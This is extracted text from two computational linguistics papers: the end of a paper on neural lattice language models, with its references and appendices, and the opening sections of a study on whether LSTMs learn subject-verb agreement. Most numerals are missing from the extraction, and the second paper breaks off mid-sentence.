are exploring techniques to store fixed embeddings dynamically, so that the non-compositional phrases can be se- lected as part of the end-to-end training. conclusion in this work, we have introduced the idea of a neural lattice language model, which allows us to marginal- ize over all segmentations of a sentence in an end- to-end fashion. in our experiments on the billion word corpus and chinese gigaword corpus, we demonstrated that the neural lattice language model beats an lstm-based baseline at the task of lan- guage modeling, both when it is used to incorpo- rate multiple-word phrases and multiple-embedding words. qualitatively, we observed that the latent segmentations generated by the model correspond well to human intuition about multi-word phrases, and that the varying usage of words with multiple embeddings seems to also be sensible. acknowledgements the authors would like to thank holger schwenk, kristina toutanova, cindy robinson, and all the re- viewers of this work for their invaluable feedback. references oliver adams, adam makarucha, graham neubig, steven bird, and trevor cohn. . cross-lingual word embeddings for low-resource language model- ing. in proceedings of the th conference of the eu- ropean chapter of the association for computational linguistics: volume , long papers, volume , pages – . ben athiwaratkun and andrew wilson. . multi- modal word distributions. in proceedings of the th annual meeting of the association for computational linguistics (volume : long papers), volume , pages – . dzmitry bahdanau, jan chorowski, dmitriy serdyuk, philemon brakel, and yoshua bengio. . end- to-end attention-based large-vocabulary speech recog- nition. in ieee international conference on acous- tics, speech and signal processing, pages – . ieee. colin bannard and danielle matthews. . stored word sequences in language learning: the effect of familiarity on children’s repetition of four-word com- binations. psychological science, ( ): – . william chan, yu zhang, quoc le, and navdeep jaitly. . latent sequence decompositions. th interna- tional conference on learning representations. ciprian chelba, tomas mikolov, mike schuster, qi ge, thorsten brants, phillipp koehn, and tony robinson. . one billion word benchmark for measuring progress in statistical language modeling. interspeech. xinchi chen, xipeng qiu, jingxiang jiang, and xuanjing huang. . gaussian mixture embeddings for mul- tiple word prototypes. corr, abs/ . . sumit chopra, michael auli, alexander m rush, and seas harvard. . abstractive sentence sum- marization with attentive recurrent neural networks. north american chapter of the association for com- putational linguistics: human language technolo- gies, pages – . pierre dupont and ronald rosenfeld. . lattice based language models. technical report, dtic doc- ument. chris dyer, adhiguna kuncoro, miguel ballesteros, and noah a smith. . recurrent neural network gram- mars. north american chapter of the association for computational linguistics: human language tech- nologies, pages – . jeffrey l. elman. . finding structure in time. cog- nitive science, ( ): – . yarin gal and zoubin ghahramani. . a theoreti- cally grounded application of dropout in recurrent neu- ral networks. in advances in neural information pro- cessing systems, pages – . sharon goldwater, thomas l. griffiths, mark johnson, et al. . distributional cues to word boundaries: context is important. in h. caunt-nulton, s. kilati- late, and i. woo, editors, bucld : proceedings of the st annual boston university conference on lan- guage development, pages – . somerville, mas- sachusetts: cascadilla press. alex graves, abdel-rahman mohamed, and geoffrey hinton. . speech recognition with deep recurrent neural networks. in ieee international conference on acoustics, speech and signal processing, pages – . ieee. klaus greff, rupesh k. srivastava, jan koutnı́k, bas r. steunebrink, and jürgen schmidhuber. . lstm: a search space odyssey. ieee transactions on neural networks and learning systems. sepp hochreiter and jürgen schmidhuber. . long short-term memory. neural computation, ( ): – . kyuyeon hwang and wonyong sung. . character- level language modeling with hierarchical recurrent neural networks. in ieee international conference on acoustics, speech and signal processing, pages – . ieee. hakan inan, khashayar khosravi, and richard socher. . tying word vectors and word classifiers: a loss framework for language modeling. th international conference on learning representations. eric jang, shixiang gu, and ben poole. . categori- cal reparameterization with gumbel-softmax. th in- ternational conference on learning representations. rafal jozefowicz, oriol vinyals, mike schuster, noam shazeer, and yonghui wu. . exploring the limits of language modeling. arxiv: . . philipp koehn and rebecca knowles. . six chal- lenges for neural machine translation. in proceedings of the first workshop on neural machine translation, pages – . jan koutnik, klaus greff, faustino gomez, and juergen schmidhuber. . a clockwork rnn. proceedings of machine learning research. wang ling, isabel trancoso, chris dyer, and alan w. black. . character-based neural machine transla- tion. corr, abs/ . . wang ling, edward grefenstette, karl moritz hermann, tomáš kočiskỳ, andrew senior, fumin wang, and phil blunsom. . latent predictor networks for code generation. association for computational lin- guistics. chris j maddison, andriy mnih, and yee whye teh. . the concrete distribution: a continuous relax- ation of discrete random variables. th international conference on learning representations. stephen merity, caiming xiong, james bradbury, and richard socher. . pointer sentinel mixture mod- els. th international conference on learning repre- sentations. arvind neelakantan, jeevan shankar, re passos, and an- drew mccallum. . efficient nonparametric es- timation of multiple embeddings per word in vector space. in proceedings of emnlp. citeseer. graham neubig, masato mimura, shinsuke mori, and tatsuya kawahara. . learning a language model from continuous speech. in interspeech, pages – . graham neubig, chris dyer, yoav goldberg, austin matthews, waleed ammar, antonios anastasopoulos, miguel ballesteros, david chiang, daniel clothiaux, trevor cohn, et al. . dynet: the dynamic neural network toolkit. arxiv preprint arxiv: . . ofir press and lior wolf. . using the output embed- ding to improve language models. th international conference on learning representations. yael ravin and claudia leacock. . polysemy: the- oretical and computational approaches. oup ox- ford. rico sennrich, barry haddow, and alexandra birch. . neural machine translation of rare words with subword units. association for computational lin- guistics. anna siyanova-chanturia, kathy conklin, and norbert schmitt. . adding more fuel to the fire: an eye-tracking study of idiom processing by native and non-native speakers. second language research, ( ): – . matthias sperber, graham neubig, jan niehues, and alex waibel. . neural lattice-to-sequence mod- els for uncertain inputs. in proceedings of the conference on empirical methods in natural lan- guage processing, pages – . jinsong su, zhixing tan, deyi xiong, and yang liu. . lattice-based recurrent neural net- work encoders for neural machine translation. corr, abs/ . , ver. . kai sheng tai, richard socher, and christopher d. man- ning. . improved semantic representations from tree-structured long short-term memory networks. as- sociation for computational linguistics. lukáš burget jan honza cernock sanjeev khudanpur tomáš mikolov, martin karafiát. . recur- rent neural network based language model. pro- ceedings of the th annual conference of the inter- national speech communication association, pages – . bart van merriënboer, amartya sanyal, hugo larochelle, and yoshua bengio. . multiscale sequence modeling with a learned dictionary. arxiv preprint arxiv: . . ladislav zgusta. . multiword lexical units. word, ( - ): – . hao zhou, zhaopeng tu, shujian huang, xiaohua liu, hang li, and jiajun chen. . chunk-based bi- scale decoder for neural machine translation. associa- tion for computational linguistics. a large-scale experiments to verify that our findings scale to state-of-the- art language models, we also compared a baseline model, dense lattices of size and , and a multi- lattice with embeddings per word on the full byte- pair encoded billion word corpus. in this set of experiments, we take the full bil- lion word corpus, and apply byte-pair encoding as described by sennrich et al. ( ) to construct a vocabulary of , sub-word tokens. our model consists of three lstm layers, each with hid- den units. we train the model for a single epoch over the corpus, using the adam optimizer with learning rate . on a p gpu. we use a batch size of , and variational dropout of . . the , sub-word embeddings each had dimension . for lattice models, chunk vocabularies were selected by taking the , sub-words in the vocabulary and adding the most common , n-grams with < n ≤ l. the weights on the final layer of the network were tied with the input embeddings, as done by press and wolf ( ) and inan et al. ( ). in all lattice models, hidden states were computed using weighted expectation (§ . . ). in multi-embedding models, embedding sizes were decreased so as to maintain the same total number of parameters. results of these experiments are in table . the performance of the baseline model is roughly on par with that of state-of-the-art models on this database; differences can be explained by model size and hy- perparameter tuning. the results show the same trend as the results of our main experiments, in- dicating that the performance gains shown by our smaller neural lattice language models generalize to the much larger datasets used in state-of-the-art sys- tems. table : results on large-scale billion word corpus model valid. test sec./ perp. perp. batch baseline . . . multi-token (l = ) . . . multi-token (l = ) . . . multi-emb (e = ) . . . table : vocabulary size comparison model valid. perp. test perp. baseline . . -chunk vocab . . -chunk vocab . . b chunk vocabulary size we compare a -lattice with a non-compositional chunk vocabulary of , phrases with a - lattice with a non-compositional chunk vocabulary of , phrases. the results can be seen in table . doubling the number of non-compositional em- beddings present decreases the perplexity, but only by a small amount. this is perhaps to be expected, given that doubling the number of embeddings cor- responds to a large increase in the number of model parameters for phrases that may have less data with which to train them. assessing the ability of lstms to learn syntax-sensitive dependencies tal linzen , emmanuel dupoux lscp & ijn , cnrs, ehess and ens, psl research university {tal.linzen, emmanuel.dupoux}@ens.fr yoav goldberg computer science department bar ilan university yoav.goldberg@gmail.com abstract the success of long short-term memory (lstm) neural networks in language process- ing is typically attributed to their ability to capture long-distance statistical regularities. linguistic regularities are often sensitive to syntactic structure; can such dependencies be captured by lstms, which do not have ex- plicit structural representations? we begin ad- dressing this question using number agreement in english subject-verb dependencies. we probe the architecture’s grammatical compe- tence both using training objectives with an explicit grammatical target (number prediction, grammaticality judgments) and using language models. in the strongly supervised settings, the lstm achieved very high overall accu- racy (less than % errors), but errors increased when sequential and structural information con- flicted. the frequency of such errors rose sharply in the language-modeling setting. we conclude that lstms can capture a non-trivial amount of grammatical structure given targeted supervision, but stronger architectures may be required to further reduce errors; furthermore, the language modeling signal is insufficient for capturing syntax-sensitive dependencies, and should be supplemented with more direct supervision if such dependencies need to be captured. introduction recurrent neural networks (rnns) are highly effec- tive models of sequential data (elman, ). the rapid adoption of rnns in nlp systems in recent years, in particular of rnns with gating mecha- nisms such as long short-term memory (lstm) units (hochreiter and schmidhuber, ) or gated recur- rent units (gru) (cho et al., ), has led to sig- nificant gains in language modeling (mikolov et al., ; sundermeyer et al., ), parsing (vinyals et al., ; kiperwasser and goldberg, ; dyer et al., ), machine translation (bahdanau et al., ) and other tasks. the effectiveness of rnns is attributed to their ability to capture statistical contingencies that may span an arbitrary number of words. the word france, for example, is more likely to occur somewhere in a sentence that begins with paris than in a sentence that begins with penguins. the fact that an arbitrary number of words can intervene between the mutually predictive words implies that they cannot be captured by models with a fixed window such as n-gram mod- els, but can in principle be captured by rnns, which do not have an architecturally fixed limit on depen- dency length. rnns are sequence models: they do not explicitly incorporate syntactic structure. indeed, many word co-occurrence statistics can be captured by treating the sentence as an unstructured list of words (paris- france); it is therefore unsurprising that rnns can learn them well. other dependencies, however, are sensitive to the syntactic structure of the sentence (chomsky, ; everaert et al., ). to what extent can rnns learn to model such phenomena based only on sequential cues? previous research has shown that rnns (in particu- lar lstms) can learn artificial context-free languages (gers and schmidhuber, ) as well as nesting and in this work we use the term rnn to refer to the entire class of sequential recurrent neural networks. instances of the class include long short-term memory networks (lstm) and the simple recurrent network (srn) due to elman ( ). transactions of the association for computational linguistics, vol. , pp. – , . action editor: hinrich schütze. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. indentation in a programming language (karpathy et al., ). the goal of the present work is to probe their ability to learn natural language hierarchical (syntactic) structures from a corpus without syntactic annotations. as a first step, we focus on a particular dependency that is commonly regarded as evidence for hierarchical structure in human language: english subject-verb agreement, the phenomenon in which the form of a verb depends on whether the subject is singular or plural (the kids play but the kid plays; see additional details in section ). if an rnn-based model succeeded in learning this dependency, that would indicate that it can learn to approximate or even faithfully implement syntactic structure. our main interest is in whether lstms have the capacity to learn structural dependencies from a nat- ural corpus. we therefore begin by addressing this question under the most favorable conditions: train- ing with explicit supervision. in the setting with the strongest supervision, which we refer to as the num- ber prediction task, we train it directly on the task of guessing the number of a verb based on the words that preceded it (sections and ). we further experiment with a grammaticality judgment training objective, in which we provide the model with full sentences an- notated as to whether or not they violate subject-verb number agreement, without an indication of the locus of the violation (section ). finally, we trained the model without any grammatical supervision, using a language modeling objective (predicting the next word). our quantitative results (section ) and qualitative analysis (section ) indicate that most naturally oc- curring agreement cases in the wikipedia corpus are easy: they can be resolved without syntactic informa- tion, based only on the sequence of nouns preceding the verb. this leads to high overall accuracy in all models. most of our experiments focus on the super- vised number prediction model. the accuracy of this model was lower on harder cases, which require the model to encode or approximate structural informa- tion; nevertheless, it succeeded in recovering the ma- jority of agreement cases even when four nouns of the opposite number intervened between the subject and the verb ( % errors). baseline models failed spec- tacularly on these hard cases, performing far below chance levels. fine-grained analysis revealed that mistakes are much more common when no overt cues to syntactic structure (in particular function words) are available, as is the case in noun-noun compounds and reduced relative clauses. this indicates that the number prediction model indeed managed to capture a decent amount of syntactic knowledge, but was overly reliant on function words. error rates increased only mildly when we switched to more indirect supervision consisting only of sentence-level grammaticality annotations without an indication of the crucial verb. by contrast, the language model trained without explicit grammati- cal supervision performed worse than chance on the harder agreement prediction cases. even a state-of- the-art large-scale language model (jozefowicz et al., ) was highly sensitive to recent but struc- turally irrelevant nouns, making more than five times as many mistakes as the number prediction model on these harder cases. these results suggest that explicit supervision is necessary for learning the agreement dependency using this architecture, limiting its plau- sibility as a model of child language acquisition (el- man, ). from a more applied perspective, this result suggests that for tasks in which it is desirable to capture syntactic dependencies (e.g., machine trans- lation or language generation), language modeling objectives should be supplemented by supervision signals that directly capture the desired behavior. background: subject-verb agreement as evidence for syntactic structure the form of an english third-person present tense verb depends on whether the head of the syntactic subject is plural or singular: ( ) a. the key is on the table. b. *the key are on the table. c. *the keys is on the table. d. the keys are on the table. while in these examples the subject’s head is adjacent to the verb, in general the two can be separated by some sentential material: identifying the head of the subject is typically straightfor- ward. in what follows we will use the shorthand “the subject” to refer to the head of the subject. in the examples, the subject and the corresponding verb are marked in boldface, agreement attractors are underlined and intervening nouns of the same number as the subject are marked in italics. asterisks mark unacceptable sentences. ( ) the keys to the cabinet are on the table. given a syntactic parse of the sentence and a verb, it is straightforward to identify the head of the subject that corresponds to that verb, and use that information to determine the number of the verb (figure ). the keys to the cabinet are on the table det nsubj prep det pobj prep det pobj root figure : the form of the verb is determined by the head of the subject, which is directly connected to it via an nsubj edge. other nouns that intervene between the head of the subject and the verb (here cabinet is such a noun) are irrelevant for determining the form of the verb and need to be ignored. by contrast, models that are insensitive to structure may run into substantial difficulties capturing this de- pendency. one potential issue is that there is no limit to the complexity of the subject np, and any number of sentence-level modifiers and parentheticals—and therefore an arbitrary number of words—can appear between the subject and the verb: ( ) the building on the far right that’s quite old and run down is the kilgore bank building. this property of the dependency entails that it can- not be captured by an n-gram model with a fixed n. rnns are in principle able to capture dependencies of an unbounded length; however, it is an empirical question whether or not they will learn to do so in practice when trained on a natural corpus. a more fundamental challenge that the depen- dency poses for structure-insensitive models is the possibility of agreement attraction errors (bock and miller, ). the correct form in ( ) could be se- lected using simple heuristics such as “agree with the most recent noun”, which are readily available to sequence models. in general, however, such heuris- tics are unreliable, since other nouns can intervene between the subject and the verb in the linear se- quence of the sentence. those intervening nouns can have the same number as the subject, as in ( ), or the opposite number as in ( )-( ): ( ) alluvial soils carried in the floodwaters add nutrients to the floodplains. ( ) the only championship banners that are cur- rently displayed within the building are for national or ncaa championships. ( ) the length of the forewings is - . ( ) yet the ratio of men who survive to the women and children who survive is not clear in this story. intervening nouns with the opposite number from the subject are called agreement attractors. the poten- tial presence of agreement attractors entails that the model must identify the head of the syntactic subject that corresponds to a given verb in order to choose the correct inflected form of that verb. given the difficulty in identifying the subject from the linear sequence of the sentence, dependencies such as subject-verb agreement serve as an argument for structured syntactic representations in humans (everaert et al., ); they may challenge models such as rnns that do not have pre-wired syntac- tic representations. we note that subject-verb num- ber agreement is only one of a number of structure- sensitive dependencies; other examples include nega- tive polarity items (e.g., any) and reflexive pronouns (herself ). nonetheless, a model’s success in learning subject-verb agreement would be highly suggestive of its ability to master hierarchical structure. the number prediction task to what extent can a sequence model learn to be sensi- tive to the hierarchical structure of natural language? to study this question, we propose the number pre- diction task. in this task, the model sees the sentence up to but not including a present-tense verb, e.g.: ( ) the keys to the cabinet it then needs to guess the number of the following verb (a binary choice, either plural or singular). we examine variations on this task in section . in order to perform well on this task, the model needs to encode the concepts of syntactic number and syntactic subjecthood: it needs to learn that some words are singular and others are plural, and to be able to identify the correct subject. as we have illus- trated in section , correctly identifying the subject that corresponds to a particular verb often requires sensitivity to hierarchical syntax. data: an appealing property of the number predic- tion task is that we can generate practically unlimited training and testing examples for this task by query- ing a corpus for sentences with present-tense verbs, and noting the number of the verb. importantly, we do not need to correctly identify the subject in order to create a training or test example. we generated a corpus of ∼ . million number prediction problems based on wikipedia, of which ∼ , ( %) were used for training, ∼ , ( %) for validation, and the remaining ∼ . million ( %) were reserved for testing. the large number of test sentences was necessary to ensure that we had a good variety of test sentences representing less common constructions (see section ). model and baselines: we encode words as one- hot vectors: the model does not have access to the characters that make up the word. those vectors are then embedded into a -dimensional vector space. an lstm with hidden units reads those embed- ding vectors in sequence; the state of the lstm at the end of the sequence is then fed into a logistic regression classifier. the network is trained in an end-to-end fashion, including the word embeddings. to isolate the effect of syntactic structure, we also consider a baseline which is exposed only to the nouns in the sentence, in the order in which they appeared originally, and is then asked to predict the number of the following verb. the goal of this base- we limited our search to sentences that were shorter than words. whenever a sentence had more than one subject-verb dependency, we selected one of the dependencies at random. code and data are available at http://tallinzen. net/projects/lstm_agreement. the network was optimized using adam (kingma and ba, ) and early stopping based on validation set error. we trained the number prediction model times with different random initializations, and report accuracy averaged across all runs. the models described in sections and are based on runs, with the exception of the language model, which is slower to train and was trained once. the size of the vocabulary was capped at (after low- ercasing). infrequent words were replaced with their part of speech (penn treebank tagset, which explicitly encodes number distinctions); this was the case for . % of all tokens and . % of the subjects. line is to withhold the syntactic information carried by function words, verbs and other parts of speech. we explore two variations on this baseline: one that only receives common nouns (dogs, pipe), and an- other that also receives pronouns (he) and proper nouns (france). we refer to these as the noun-only baselines. number prediction results overall accuracy: accuracy was very high over- all: the system made an incorrect number prediction only in . % of the dependencies. the noun-only baselines performed significantly worse: . % errors for the common-nouns case and . % errors for the all-nouns case. this suggests that function words, verbs and other syntactically informative elements play an important role in the model’s ability to cor- rectly predict the verb’s number. however, while the noun-only baselines made more than four times as many mistakes as the number prediction system, their still-low absolute error rate indicates that around % of agreement dependencies can be captured based solely on the sequence of nouns preceding the verb. this is perhaps unsurprising: sentences are often short and the verb is often directly adjacent to the sub- ject, making the identification of the subject simple. to gain deeper insight into the syntactic capabilities of the model, then, the rest of this section investigates its performance on more challenging dependencies. distance: we first examine whether the network shows evidence of generalizing to dependencies where the subject and the verb are far apart. we focus in this analysis on simpler cases where no nouns in- tervened between the subject and the verb. as figure a shows, performance did not degrade considerably when the distance between the subject and the verb grew up to words (there were very few longer dependencies). this indicates that the network gen- eralized the dependency from the common distances of and to rare distances of and more. agreement attractors: we next examine how the model’s error rate was affected by nouns that inter- vened between the subject and the verb in the linear these properties of the dependencies were identified by parsing the test sentences using the parser described in goldberg and nivre ( ). (a) distance (no intervening nouns) % % % % % % e rr o r  ra te (b) plural subject singular subject % % % % % e rr o r  ra te last intervening noun none plural singular (c) count of attractors % % % % % % e rr o r  ra te baseline (common  nouns) number prediction majority class random guess (d) no  re lati ve  cla use wi th  rel ativ ize r wi tho ut  rel ativ ize r % % % % % % e rr o r  ra te majority random (e) count of attractors c o u n t  o f  d e p e n d e n ci e s all homogeneous (f) pc . . . p c plural singular figure : (a-d) error rates of the lstm number prediction model as a function of: (a) distance between the subject and the verb, in dependencies that have no intervening nouns; (b) presence and number of last intervening noun; (c) count of attractors in dependencies with homogeneous intervention; (d) presence of a relative clause with and without an overt relativizer in dependencies with homogeneous intervention and exactly one attractor. all error bars represent % binomial confidence intervals. (e-f) additional plots: (e) count of attractors per dependency in the corpus (note that the y-axis is on a log scale); (f) embeddings of singular and plural nouns, projected onto their first two principal components. order of the sentence. we first focus on whether or not there were any intervening nouns, and if there were, whether the number of the subject differed from the number of the last intervening noun—the type of noun that would trip up the simple heuristic of agreeing with the most recent noun. as figure b shows, a last intervening noun of the same number as the subject increased error rates only moderately, from . % to . % in singular subjects and from % to . % in plural subjects. on the other hand, when the last intervening noun was an agree- ment attractor, error rates increased by almost an order of magnitude (to . % and . % respectively). note, however, that even an error rate of . % is quite impressive considering uninformed strategies such as random guessing ( % error rate), always assigning the more common class label ( % error rate, since % of the subjects in our corpus are plu- ral) and the number-of-most-recent-noun heuristic ( % error rate). the noun-only lstm baselines performed much worse in agreement attraction cases, with error rates of . % (common nouns) and % (all nouns). we next tested whether the effect of attractors is cumulative, by focusing on dependencies with multi- ple attractors. to avoid cases in which the effect of an attractor is offset by an intervening noun with the same number as the subject, we restricted our search to dependencies in which all of the intervening nouns had the same number, which we term dependencies with homogeneous intervention. for example, ( ) has homogeneous intervention whereas ( ) does not: ( ) the roses in the vase by the door are red. ( ) the roses in the vase by the chairs are red. figure c shows that error rates increased gradually as more attractors intervened between the subject and the verb. performance degraded quite slowly, how- ever: even with four attractors the error rate was only . %. as expected, the noun-only baselines per- formed significantly worse in this setting, reaching an error rate of up to % (worse than chance) in the case of four attractors. this confirms that syntactic cues are critical for solving the harder cases. relative clauses: we now look in greater detail into the network’s performance when the words that intervened between the subject and verb contained a relative clause. relative clauses with attractors are likely to be fairly challenging, for several rea- sons. they typically contain a verb that agrees with the attractor, reinforcing the misleading cue to noun number. the attractor is often itself a subject of an irrelevant verb, making a potential “agree with the most recent subject” strategy unreliable. finally, the existence of a relative clause is sometimes not overtly indicated by a function word (relativizer), as in ( ) (for comparison, see the minimally different ( )): ( ) the landmarks this article lists here are also run-of-the-mill and not notable. ( ) the landmarks that this article lists here are also run-of-the-mill and not notable. for data sparsity reasons we restricted our attention to dependencies with a single attractor and no other intervening nouns. as figure d shows, attraction errors were more frequent in dependencies with an overt relative clause ( . % errors) than in dependen- cies without a relative clause ( . %), and consider- ably more frequent when the relative clause was not introduced by an overt relativizer ( %). as in the case of multiple attractors, however, while the model struggled with the more difficult dependencies, its performance was much better than random guessing, and slightly better than a majority-class strategy. word representations: we explored the - dimensional word representations acquired by the model by performing a principal component anal- ysis. we assigned a part-of-speech (pos) to each word based on the word’s most common pos in the corpus. we only considered relatively unambiguous words, in which a single pos accounted for more than % of the word’s occurrences in the corpus. figure f shows that the first principal component corresponded almost perfectly to the expected num- ber of the noun, suggesting that the model learned the number of specific words very well; recall that the model did not have access during training to noun number annotations or to morphological suffixes such as -s that could be used to identify plurals. visualizing the network’s activations: we start investigating the inner workings of the number pre- diction network by analyzing its activation in re- sponse to particular syntactic constructions. to sim- plify the analysis, we deviate from our practice in the rest of this paper and use constructed sentences. we first constructed sets of sentence prefixes based on the following patterns: ( ) pp: the toy(s) of the boy(s)... ( ) rc: the toy(s) that the boy(s)... these patterns differ by exactly one function word, which determines the type of the modifier of the main clause subject: a prepositional phrase (pp) in the first sentence and a relative clause (rc) in the second. in pp sentences the correct number of the upcoming verb is determined by the main clause subject toy(s); in rc sentences it is determined by the embedded subject boy(s). we generated all four versions of each pattern, and repeated the process ten times with different lexical items (the house(s) of/that the girl(s), the computer(s) of/that the student(s), etc.), for a total of sentences. the network made correct number predictions for all pp sentences, but made three errors in rc sen- tences. we averaged the word-by-word activations across all sets of ten sentences that had the same com- bination of modifier (pp or rc), first noun number and second noun number. plots of the activation of all units are provided in the appendix (figure ). figure a highlights a unit (unit ) that shows a particularly clear pattern: it tracks the number of the main clause subject throughout the pp modifier; by contrast, it resets when it reaches the relativizer that which introduces the rc modifier, and then switches to tracking the number of the embedded subject. to explore how the network deals with dependen- cies spanning a larger number of words, we tracked its activation during the processing of the following two sentences: ( ) the houses of/that the man from the office across the street... the network made the correct prediction for the pp we simplified this experiment in light of the relative robust- ness of the first experiment to lexical items and to whether each of the nouns was singular or plural. (a) (b) th e ho us es th at /o f th e m an fro m th e of fic e ac ro ss th e st re et . . . p (p lu r a l) pp rc class prediction (c) figure : word-by-word visualization of lstm activation: (a) a unit that correctly predicts the number of an upcoming verb. this number is determined by the first noun (x) when the modifier is a prepositional phrase (pp) and by the second noun (y) when it is an object relative clause (rc); (b) the evolution of the predictions in the case of a longer modifier: the predictions correctly diverge at the embedded noun, but then incorrectly converge again; (c) the activation of four representative units over the course of the same sentences. but not the rc sentence (as before, the correct pre- dictions are plural for pp and singular for rc). figure b shows that the network begins by mak- ing the correct prediction for rc immediately after that, but then falters: as the sentence goes on, the resetting effect of that diminishes. the activation time courses shown in figure c illustrate that unit , which identified the subject correctly when the prefix was short, gradually forgets that it is in an embedded clause as the prefix grows longer. by contrast, unit shows a stable capacity to remember the current embedding status. additional representative units shown in figure c are unit , which consistently stores the number of the main clause subject, and unit , which tracks the number of the most recent noun, resetting at noun phrase boundaries. while the interpretability of these patterns is en- couraging, our analysis only scratches the surface of the rich possibilities of a linguistically-informed analysis of a neural network trained to perform a syntax-sensitive task; we leave a more extensive in- vestigation for future work. alternative training objectives the number prediction task followed a fully super- vised objective, in which the network identifies the number of an upcoming verb based only on the words preceding the verb. this section proposes three objec- tives that modify some of the goals and assumptions of the number prediction objective (see table for an overview). verb inflection: this objective is similar to num- ber prediction, with one difference: the network re- ceives not only the words leading up to the verb, but also the singular form of the upcoming verb (e.g., writes). in practice, then, the network needs to decide between the singular and plural forms of a particular verb (writes or write). having access to the semantics of the verb can help the network identify the noun that serves as its subject without using the syntactic subjecthood criteria. for example, in the following sentence: ( ) people from the capital often eat pizza. training objective sample input training signal prediction task correct answer number prediction the keys to the cabinet plural singular/plural? plural verb inflection the keys to the cabinet [is/are] plural singular/plural? plural grammaticality the keys to the cabinet are here. grammatical grammatical/ungrammatical? grammatical language model the keys to the cabinet are p(are) > p(is)? true table : examples of the four training objectives and corresponding prediction tasks. only people is a plausible subject for eat; the network can use this information to infer that the correct form of the verb is eat is rather than eats. this objective is similar to the task that humans face during language production: after the speaker has decided to use a particular verb (e.g., write), he or she needs to decide whether its form will be write or writes (levelt et al., ; staub, ). grammaticality judgments: the previous objec- tives explicitly indicate the location in the sentence in which a verb can appear, giving the network a cue to syntactic clause boundaries. they also explicitly di- rect the network’s attention to the number of the verb. as a form of weaker supervision, we experimented with a grammaticality judgment objective. in this scenario, the network is given a complete sentence, and is asked to judge whether or not it is grammatical. to train the network, we made half of the examples in our training corpus ungrammatical by flipping the number of the verb. the network read the entire sentence and received a supervision signal at the end. this task is modeled after a common human data col- lection technique in linguistics (schütze, ), al- though our training regime is of course very different to the training that humans are exposed to: humans rarely receive ungrammatical sentences labeled as such (bowerman, ). language modeling (lm): finally, we experi- mented with a word prediction objective, in which the model did not receive any grammatically relevant supervision (elman, ; elman, ). in this sce- nario, the goal of the network is to predict the next word at each point in every sentence. it receives un- in some sentences this will not in fact result in an ungram- matical sentence, e.g. with collective nouns such as group, which are compatible with both singular and plural verbs in some di- alects of english (huddleston and pullum, ); those cases appear to be rare. labeled sentences and is not specifically instructed to attend to the number of the verb. in the network that implements this training scenario, rnn activation after each word is fed into a fully connected dense layer followed by a softmax layer over the entire vocabulary. we evaluate the knowledge that the network has acquired about subject-verb noun agreement using a task similar to the verb inflection task. to per- form the task, we compare the probabilities that the model assigns to the two forms of the verb that in fact occurred in the corpus (e.g., write and writes), and select the form with the higher probability. as this task is not part of the network’s training objec- tive, and the model needs to allocate considerable resources to predicting each word in the sentence, we expect the lm to perform worse than the explicitly supervised objectives. results: when considering all agreement depen- dencies, all models achieved error rates below % (figure a); as mentioned above, even the noun-only number prediction baselines achieved error rates be- low % on this task. at the same time, there were large differences in accuracy across training objec- tives. the verb inflection network performed slightly but significantly better than the number prediction one ( . % compared to . % errors), suggesting that the semantic information carried by the verb is moderately helpful. the grammaticality judgment objective performed somewhat worse, at . % errors, but still outperformed the noun-only baselines by a large margin, showing the capacity of the lstm ar- chitecture to learn syntactic dependencies even given fairly indirect evidence. one could also imagine performing the equivalent of the number prediction task by aggregating lm probability mass over all plural verbs and all singular verbs. this approach may be more severely affected by part-of-speech ambiguous words than the one we adopted; we leave the exploration of this approach to future work. (a) nu mb er  pre dic tion gr am ma tica lity  jud gm en ts ve rb  infl ect ion la ng ua ge  m od el ba sel ine  (c om mo n n ou ns) ba sel ine  (a ll n ou ns) % % % % % % o ve ra ll  e rr o r  ra te (b) count of attractors % % % % % % e rr o r  ra te grammaticality verb inflection language modeling number prediction baseline (all nouns) baseline (common nouns) majority class random guess (c) count of attractors % % % % % % e rr o r  ra te our lm verb inflection google lm majority random (d) count of attractors % % % % % % e rr o r  ra te lstmsrn lstm (targeted) majority random number prediction (e) . count of attractors % % % % % % e rr o r  ra te majority random singular subj. plural subj. lstm count of attractors majority random singular subj. plural subj. srn figure : alternative tasks and additional experiments: (a) overall error rate across tasks (note that the y-axis ends in %); (b) effect of count of attractors in homogeneous dependencies across training objectives; (c) comparison of the google lm (jozefowicz et al., ) to our lm and one of our supervised verb inflection systems, on a sample of sentences; (d) number prediction: effect of count of attractors using srns with standard training or lstm with targeted training; (e) number prediction: difference in error rate between singular and plural subjects across rnn cell types. error bars represent binomial % confidence intervals. the worst performer was the language model. it made eight times as many errors as the original num- ber prediction network ( . % compared to . %), and did substantially worse than the noun-only base- lines (though recall that the noun-only baselines were still explicitly trained to predict verb number). the differences across the networks are more strik- ing when we focus on dependencies with agreement attractors (figure b). here, the language model does worse than chance in the most difficult cases, and only slightly better than the noun-only baselines. the worse-than-chance performance suggests that attractors actively confuse the networks rather than cause them to make a random decision. the other models degrade more gracefully with the number of agreement attractors; overall, the grammaticality judgment objective is somewhat more difficult than the number prediction and verb inflection ones. in summary, we conclude that while the lstm is capa- ble of learning syntax-sensitive agreement dependen- cies under various objectives, the language-modeling objective alone is not sufficient for learning such de- pendencies, and a more direct form of training signal is required. comparison to a large-scale language model: one objection to our language modeling result is that our lm faced a much harder objective than our other models—predicting a distribution over , vocabulary items is certainly harder than bi- nary classification—but was equipped with the same capacity ( -dimensional hidden state and word vec- tors). would the performance gap between the lm and the explicitly supervised models close if we in- creased the capacity of the lm? we address this question using a very large pub- licly available lm (jozefowicz et al., ), which we refer to as the google lm. the google lm rep- resents the current state-of-the-art in language mod- eling: it is trained on a billion-word corpus (chelba et al., ), with a vocabulary of , words. it is based on a two-layer lstm with units in each layer, or more than times as many units https://github.com/tensorflow/models/ tree/master/lm_ b as our lm; at . billion parameters it has almost times as many parameters. it is a fine-tuned language model that achieves impressive perplexity scores on common benchmarks, requires a massive infrastructure for training, and pushes the boundaries of what’s feasible with current hardware. we tested the google lm with the methodology we used to test ours. due to computational resource limitations, we did not evaluate it on the entire test set, but sampled a random selection of sentences for each count of attractors (testing a single sentence under the google lm takes around seconds on average). the results are presented in figure c, where they are compared to the performance of the supervised verb inflection system. despite having an order of magnitude more parameters and significantly larger training data, the google lm performed poorly compared to the supervised models; even a single attractor led to a sharp increase in error rate to . %, almost as high as our small-scale lm ( . % on the same sentences). while additional attractors caused milder degradation than in our lm, the performance of the google lm on sentences with four attractors was still worse than always guessing the majority class (singular). in summary, our experiments with the google lm do not change our conclusions: the 